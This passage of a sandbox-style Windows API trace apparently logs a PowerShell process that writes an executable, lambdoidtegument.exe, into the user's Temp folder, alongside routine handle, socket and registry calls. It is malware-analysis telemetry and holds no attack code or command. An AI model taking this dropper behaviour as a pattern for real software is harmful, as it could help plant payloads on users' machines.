[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x3fff798) returned 1 [0057.204] GetLastError () returned 0x0 [0057.204] CreateMutexW (lpMutexAttributes=0x2564c74, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x528 [0057.204] GetLastError () returned 0x0 [0057.204] WaitForSingleObject (hHandle=0x528, dwMilliseconds=0x1f4) returned 0x0 [0057.204] GetLastError () returned 0x0 [0057.204] ReleaseMutex (hMutex=0x528) returned 1 [0057.204] GetLastError () returned 0x0 [0057.204] CloseHandle (hObject=0x528) returned 1 [0057.204] GetLastError () returned 0x0 [0057.209] setsockopt (s=0x4cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0057.209] GetLastError () returned 0x0 [0057.210] closesocket (s=0x4cc) returned 0 [0057.210] GetLastError () returned 0x0 [0057.212] DeregisterEventSource (hEventLog=0x4390004) returned 1 [0057.218] GetLastError () returned 0x0 [0057.223] CloseHandle (hObject=0x418) returned 1 [0057.223] GetLastError () returned 0x0 [0057.224] CloseHandle (hObject=0x4ec) returned 1 [0057.224] GetLastError () returned 0x0 [0057.224] CloseHandle (hObject=0x4f0) returned 1 [0057.224] GetLastError () returned 0x0 [0057.224] CloseHandle (hObject=0x410) returned 1 [0057.224] GetLastError () returned 0x0 [0057.224] CloseHandle (hObject=0x40c) returned 1 [0057.224] GetLastError () returned 0x0 [0057.225] CloseHandle (hObject=0x3c0) returned 1 [0057.225] GetLastError () returned 0x0 [0057.225] CloseHandle (hObject=0x3bc) returned 1 [0057.225] GetLastError () returned 0x0 [0057.225] CloseHandle (hObject=0x3b8) returned 1 [0057.225] GetLastError () returned 0x0 [0057.225] CloseHandle (hObject=0x388) returned 1 [0057.225] GetLastError () returned 0x0 [0057.225] CloseHandle (hObject=0x3b4) returned 1 [0057.226] GetLastError () returned 0x0 [0057.226] CloseHandle (hObject=0x3b0) returned 1 [0057.226] GetLastError () returned 0x0 [0057.226] CloseHandle (hObject=0x4c8) returned 1 [0057.226] GetLastError () returned 
0x0 [0057.226] CloseHandle (hObject=0x408) returned 1 [0057.226] GetLastError () returned 0x0 [0057.227] CloseHandle (hObject=0x3f4) returned 1 [0057.227] GetLastError () returned 0x0 [0057.227] CloseHandle (hObject=0x3ec) returned 1 [0057.227] GetLastError () returned 0x0 [0057.227] CloseHandle (hObject=0x3e8) returned 1 [0057.227] GetLastError () returned 0x0 [0057.227] CloseHandle (hObject=0x368) returned 1 [0057.227] GetLastError () returned 0x0 [0057.227] CloseHandle (hObject=0x364) returned 1 [0057.227] GetLastError () returned 0x0 [0057.228] CloseHandle (hObject=0x360) returned 1 [0057.228] GetLastError () returned 0x0 [0057.228] CloseHandle (hObject=0x35c) returned 1 [0057.228] GetLastError () returned 0x0 [0057.228] CloseHandle (hObject=0x358) returned 1 [0057.228] GetLastError () returned 0x0 [0057.228] CloseHandle (hObject=0x350) returned 1 [0057.228] GetLastError () returned 0x0 [0057.229] CloseHandle (hObject=0x354) returned 1 [0057.229] GetLastError () returned 0x0 [0057.229] CloseHandle (hObject=0x398) returned 1 [0057.229] GetLastError () returned 0x0 [0057.230] setsockopt (s=0x4e4, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0057.230] GetLastError () returned 0x273a [0057.230] closesocket (s=0x4e4) returned 0 [0057.230] GetLastError () returned 0x0 [0057.230] CloseHandle (hObject=0x4e8) returned 1 [0057.230] GetLastError () returned 0x0 [0057.230] setsockopt (s=0x4dc, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0057.230] GetLastError () returned 0x273a [0057.230] closesocket (s=0x4dc) returned 0 [0057.230] GetLastError () returned 0x0 [0057.230] CloseHandle (hObject=0x4d4) returned 1 [0057.230] GetLastError () returned 0x0 [0057.231] CloseHandle (hObject=0x4b8) returned 1 [0057.231] GetLastError () returned 0x0 [0057.231] CloseHandle (hObject=0x4b4) returned 1 [0057.231] GetLastError () returned 0x0 [0057.231] CloseHandle (hObject=0x464) returned 1 [0057.231] GetLastError () returned 0x0 [0057.231] 
CloseHandle (hObject=0x460) returned 1 [0057.231] GetLastError () returned 0x0 [0057.232] CloseHandle (hObject=0x45c) returned 1 [0057.232] GetLastError () returned 0x0 [0057.232] CloseHandle (hObject=0x458) returned 1 [0057.232] GetLastError () returned 0x0 [0057.232] RegCloseKey (hKey=0x454) returned 0x0 [0057.232] GetLastError () returned 0x0 [0057.233] CloseHandle (hObject=0x450) returned 1 [0057.233] GetLastError () returned 0x0 [0057.233] RegCloseKey (hKey=0x44c) returned 0x0 [0057.233] GetLastError () returned 0x0 [0057.233] CloseHandle (hObject=0x448) returned 1 [0057.233] GetLastError () returned 0x0 [0057.233] RegCloseKey (hKey=0x444) returned 0x0 [0057.233] GetLastError () returned 0x0 [0057.233] RegCloseKey (hKey=0x440) returned 0x0 [0057.233] GetLastError () returned 0x0 [0057.233] CloseHandle (hObject=0x428) returned 1 [0057.233] GetLastError () returned 0x0 [0057.234] RegCloseKey (hKey=0x330) returned 0x0 [0057.234] CloseHandle (hObject=0x32c) returned 1 [0057.234] GetLastError () returned 0x0 [0057.234] CloseHandle (hObject=0x31c) returned 1 [0057.234] GetLastError () returned 0x0 [0057.234] CloseHandle (hObject=0x2fc) returned 1 [0057.234] GetLastError () returned 0x0 [0057.234] CloseHandle (hObject=0x2f8) returned 1 [0057.234] GetLastError () returned 0x0 [0057.234] CloseHandle (hObject=0x390) returned 1 [0057.235] GetLastError () returned 0x0 [0057.235] CloseHandle (hObject=0x38c) returned 1 [0057.235] GetLastError () returned 0x0 [0057.235] CloseHandle (hObject=0x36c) returned 1 [0057.235] GetLastError () returned 0x0 [0057.235] CloseHandle (hObject=0x3a0) returned 1 [0057.235] GetLastError () returned 0x0 [0057.235] CloseHandle (hObject=0x384) returned 1 [0057.235] GetLastError () returned 0x0 [0057.235] CloseHandle (hObject=0x380) returned 1 [0057.235] GetLastError () returned 0x0 [0057.235] CloseHandle (hObject=0x37c) returned 1 [0057.236] GetLastError () returned 0x0 [0057.236] CloseHandle (hObject=0x378) returned 1 [0057.236] GetLastError 
() returned 0x0 [0057.236] CloseHandle (hObject=0x374) returned 1 [0057.236] GetLastError () returned 0x0 [0057.236] setsockopt (s=0x420, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0057.236] GetLastError () returned 0x273a [0057.236] closesocket (s=0x420) returned 0 [0057.236] GetLastError () returned 0x0 [0057.236] CloseHandle (hObject=0x424) returned 1 [0057.236] GetLastError () returned 0x0 [0057.237] setsockopt (s=0x414, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0057.237] GetLastError () returned 0x273a [0057.237] closesocket (s=0x414) returned 0 [0057.237] GetLastError () returned 0x0 [0057.237] CloseHandle (hObject=0x41c) returned 1 [0057.237] GetLastError () returned 0x0 [0057.237] RegCloseKey (hKey=0x50c) returned 0x0 [0057.237] CloseHandle (hObject=0x508) returned 1 [0057.237] GetLastError () returned 0x0 [0057.237] CloseHandle (hObject=0x504) returned 1 [0057.237] GetLastError () returned 0x0 [0057.238] CloseHandle (hObject=0x500) returned 1 [0057.238] GetLastError () returned 0x0 [0057.238] CloseHandle (hObject=0x4fc) returned 1 [0057.238] GetLastError () returned 0x0 [0057.238] CloseHandle (hObject=0x4f8) returned 1 [0057.238] GetLastError () returned 0x0 [0057.238] CloseHandle (hObject=0x324) returned 1 [0057.238] GetLastError () returned 0x0 [0057.238] RegCloseKey (hKey=0x80000004) returned 0x0 [0057.239] CloseHandle (hObject=0x2e0) returned 1 [0057.239] GetLastError () returned 0x0 [0057.239] CloseHandle (hObject=0x314) returned 1 [0057.239] GetLastError () returned 0x0 [0057.239] UnmapViewOfFile (lpBaseAddress=0x1ea0000) returned 1 [0057.243] UnmapViewOfFile (lpBaseAddress=0x4770000) returned 1 [0057.244] GetLastError () returned 0x0 Thread: id = 60 os_tid = 0xb78 [0054.090] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0054.121] SetThreadUILanguage (LangId=0x0) returned 0x409 [0054.128] VirtualQuery (in: lpAddress=0x51cdff0, lpBuffer=0x51ceff0, dwLength=0x1c | out: 
lpBuffer=0x51ceff0*(BaseAddress=0x51cd000, AllocationBase=0x4840000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0054.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.131] GetLastError () returned 0xcb [0054.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.133] GetLastError () returned 0xcb [0054.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.135] GetLastError () returned 0xcb [0054.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.145] GetLastError () returned 0xcb [0054.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.147] GetLastError () returned 0xcb [0054.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.148] GetLastError () returned 0xcb [0054.164] VirtualQuery (in: lpAddress=0x51ce10c, lpBuffer=0x51cf10c, dwLength=0x1c | out: lpBuffer=0x51cf10c*(BaseAddress=0x51ce000, AllocationBase=0x4840000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.164] GetLastError () returned 0xcb [0054.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.166] GetLastError () returned 0xcb [0054.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.166] GetLastError () returned 0xcb [0054.191] GetEnvironmentVariableW (in: 
lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.192] GetLastError () returned 0xcb [0054.205] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.205] GetLastError () returned 0xcb [0054.254] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.254] GetLastError () returned 0xcb [0054.256] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.256] GetLastError () returned 0xcb [0054.256] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.256] GetLastError () returned 0xcb [0054.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.258] GetLastError () returned 0xcb [0054.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.258] GetLastError () returned 0xcb [0054.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.259] GetLastError () returned 0xcb [0054.260] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.260] GetLastError () returned 0xcb [0054.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.281] GetLastError () returned 0xcb [0054.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.308] GetLastError () returned 0xcb [0054.310] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.310] GetLastError () returned 0xcb [0054.692] 
GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x51ce664, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0054.692] GetLastError () returned 0xcb [0054.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x51ce618, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0054.692] GetLastError () returned 0xcb [0054.699] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x396c78, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0054.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x51ce69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0054.700] GetLastError () returned 0x0 [0054.715] GetCurrentProcess () returned 0xffffffff [0054.715] GetLastError () returned 0x3f0 [0054.715] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce7b0 | out: TokenHandle=0x51ce7b0*=0x398) returned 1 [0054.715] GetLastError () returned 0x3f0 [0054.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x51ce348, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e [0054.720] GetLastError () returned 0x0 [0054.747] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: 
"c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x51ce7f0 | out: lpFileInformation=0x51ce7f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e385d07, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x8e385d07, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x7da1e096, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0054.747] GetLastError () returned 0x0 [0054.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x51ce308, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0054.749] GetLastError () returned 0x0 [0054.749] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x51ce7ec | out: lpFileInformation=0x51ce7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e385d07, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x8e385d07, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x7da1e096, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0054.749] GetLastError () returned 0x0 [0054.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x51ce254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0054.749] GetLastError () returned 0x0 [0054.749] SetErrorMode (uMode=0x1) returned 0x1 [0054.749] CreateFileW 
(lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0054.749] GetLastError () returned 0x0 [0054.749] GetFileType (hFile=0x354) returned 0x1 [0054.749] SetErrorMode (uMode=0x1) returned 0x1 [0054.749] GetFileType (hFile=0x354) returned 0x1 [0054.750] GetFileSize (in: hFile=0x354, lpFileSizeHigh=0x51ce7c0 | out: lpFileSizeHigh=0x51ce7c0*=0x0) returned 0x65b3 [0054.750] GetLastError () returned 0x0 [0054.751] ReadFile (in: hFile=0x354, lpBuffer=0x2509518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x51ce778, lpOverlapped=0x0 | out: lpBuffer=0x2509518*, lpNumberOfBytesRead=0x51ce778*=0x1000, lpOverlapped=0x0) returned 1 [0054.751] GetLastError () returned 0x0 [0054.754] ReadFile (in: hFile=0x354, lpBuffer=0x2509518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x51ce588, lpOverlapped=0x0 | out: lpBuffer=0x2509518*, lpNumberOfBytesRead=0x51ce588*=0x1000, lpOverlapped=0x0) returned 1 [0054.754] GetLastError () returned 0x0 [0054.755] ReadFile (in: hFile=0x354, lpBuffer=0x2509518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x51ce430, lpOverlapped=0x0 | out: lpBuffer=0x2509518*, lpNumberOfBytesRead=0x51ce430*=0x1000, lpOverlapped=0x0) returned 1 [0054.755] GetLastError () returned 0x0 [0054.755] ReadFile (in: hFile=0x354, lpBuffer=0x2509518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x51ce430, lpOverlapped=0x0 | out: lpBuffer=0x2509518*, lpNumberOfBytesRead=0x51ce430*=0x1000, lpOverlapped=0x0) returned 1 [0054.755] GetLastError () returned 0x0 [0054.755] ReadFile (in: hFile=0x354, lpBuffer=0x2509518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x51ce430, lpOverlapped=0x0 | out: lpBuffer=0x2509518*, lpNumberOfBytesRead=0x51ce430*=0x1000, lpOverlapped=0x0) 
returned 1 [0054.755] GetLastError () returned 0x0 [0054.761] ReadFile (in: hFile=0x354, lpBuffer=0x2509518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x51ce564, lpOverlapped=0x0 | out: lpBuffer=0x2509518*, lpNumberOfBytesRead=0x51ce564*=0x1000, lpOverlapped=0x0) returned 1 [0054.761] GetLastError () returned 0x0 [0054.761] ReadFile (in: hFile=0x354, lpBuffer=0x2509518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x51ce3f8, lpOverlapped=0x0 | out: lpBuffer=0x2509518*, lpNumberOfBytesRead=0x51ce3f8*=0x5b3, lpOverlapped=0x0) returned 1 [0054.761] GetLastError () returned 0x0 [0054.761] ReadFile (in: hFile=0x354, lpBuffer=0x2509518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x51ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x2509518*, lpNumberOfBytesRead=0x51ce4e4*=0x0, lpOverlapped=0x0) returned 1 [0054.761] GetLastError () returned 0x0 [0054.762] CloseHandle (hObject=0x354) returned 1 [0054.762] GetLastError () returned 0x0 [0054.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x51ce664, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0054.764] GetLastError () returned 0x0 [0054.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x51ce618, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0054.764] GetLastError () returned 0x0 [0054.764] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x396c78, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0054.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, 
lpBuffer=0x51ce69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0054.764] GetLastError () returned 0x0 [0054.765] GetCurrentProcess () returned 0xffffffff [0054.765] GetLastError () returned 0x3f0 [0054.765] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51cea40 | out: TokenHandle=0x51cea40*=0x354) returned 1 [0054.765] GetLastError () returned 0x3f0 [0054.766] GetCurrentProcess () returned 0xffffffff [0054.766] GetLastError () returned 0x3f0 [0054.766] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51cea40 | out: TokenHandle=0x51cea40*=0x350) returned 1 [0054.766] GetLastError () returned 0x3f0 [0054.769] GetCurrentProcess () returned 0xffffffff [0054.769] GetLastError () returned 0x3f0 [0054.769] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce7b0 | out: TokenHandle=0x51ce7b0*=0x358) returned 1 [0054.769] GetLastError () returned 0x3f0 [0054.769] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x51ce7f0 | out: lpFileInformation=0x51ce7f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0054.769] GetLastError () returned 0x2 [0054.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x51ce308, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0054.769] GetLastError () returned 0x2 [0054.769] 
GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x51ce7ec | out: lpFileInformation=0x51ce7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0054.769] GetLastError () returned 0x2 [0054.769] GetCurrentProcess () returned 0xffffffff [0054.769] GetLastError () returned 0x3f0 [0054.769] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51cea40 | out: TokenHandle=0x51cea40*=0x35c) returned 1 [0054.769] GetLastError () returned 0x3f0 [0054.770] GetCurrentProcess () returned 0xffffffff [0054.770] GetLastError () returned 0x3f0 [0054.770] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51cea40 | out: TokenHandle=0x51cea40*=0x360) returned 1 [0054.770] GetLastError () returned 0x3f0 [0054.776] GetCurrentProcess () returned 0xffffffff [0054.776] GetLastError () returned 0x3f0 [0054.776] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce81c | out: TokenHandle=0x51ce81c*=0x364) returned 1 [0054.776] GetLastError () returned 0x3f0 [0054.816] GetCurrentProcess () returned 0xffffffff [0054.816] GetLastError () returned 0x3f0 [0054.816] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce82c | out: TokenHandle=0x51ce82c*=0x368) returned 1 [0054.816] GetLastError () returned 0x3f0 [0054.818] GetLongPathNameW (in: lpszShortPath="C:\\Users\\BGC6U8~1\\", lpszLongPath=0x51ce710, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\BGC6u8Oy yXGxkR\\") returned 0x19 [0054.819] GetLastError () returned 0x3f0 [0054.819] 
GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", nBufferLength=0x105, lpBuffer=0x51ce738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", lpFilePart=0x0) returned 0x40 [0054.819] GetLastError () returned 0x3f0 [0054.819] SetErrorMode (uMode=0x1) returned 0x1 [0054.819] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x388 [0054.819] GetLastError () returned 0x0 [0054.819] GetFileType (hFile=0x388) returned 0x1 [0054.819] SetErrorMode (uMode=0x1) returned 0x1 [0054.819] GetFileType (hFile=0x388) returned 0x1 [0054.820] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a8 [0054.820] GetLastError () returned 0x0 [0054.820] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ac [0054.820] GetLastError () returned 0x0 [0054.833] GetCurrentProcess () returned 0xffffffff [0054.833] GetLastError () returned 0x3f0 [0054.833] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce840 | out: TokenHandle=0x51ce840*=0x3b0) returned 1 [0054.833] GetLastError () returned 0x3f0 [0054.836] GetCurrentProcess () returned 0xffffffff [0054.836] GetLastError () returned 0x3f0 [0054.836] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce850 | out: TokenHandle=0x51ce850*=0x3b4) returned 1 [0054.836] GetLastError () returned 0x3f0 [0054.868] GetCurrentProcess () returned 0xffffffff [0054.868] GetLastError () returned 0x3f0 [0054.868] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce814 | 
out: TokenHandle=0x51ce814*=0x3b8) returned 1 [0054.868] GetLastError () returned 0x3f0 [0054.870] GetCurrentProcess () returned 0xffffffff [0054.870] GetLastError () returned 0x3f0 [0054.870] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce824 | out: TokenHandle=0x51ce824*=0x3bc) returned 1 [0054.870] GetLastError () returned 0x3f0 [0054.873] GetCurrentProcess () returned 0xffffffff [0054.873] GetLastError () returned 0x3f0 [0054.873] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ceb18 | out: TokenHandle=0x51ceb18*=0x3c0) returned 1 [0054.873] GetLastError () returned 0x3f0 [0054.885] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x51cdb78 | out: phkResult=0x51cdb78*=0x3c4) returned 0x0 [0054.885] RegQueryValueExW (in: hKey=0x3c4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x51cdbc0, lpData=0x0, lpcbData=0x51cdbbc*=0x0 | out: lpType=0x51cdbc0*=0x1, lpData=0x0, lpcbData=0x51cdbbc*=0xe) returned 0x0 [0054.885] RegQueryValueExW (in: hKey=0x3c4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x51cdbc0, lpData=0x396c78, lpcbData=0x51cdbbc*=0xe | out: lpType=0x51cdbc0*=0x1, lpData="Client", lpcbData=0x51cdbbc*=0xe) returned 0x0 [0054.886] RegCloseKey (hKey=0x3c4) returned 0x0 [0054.893] 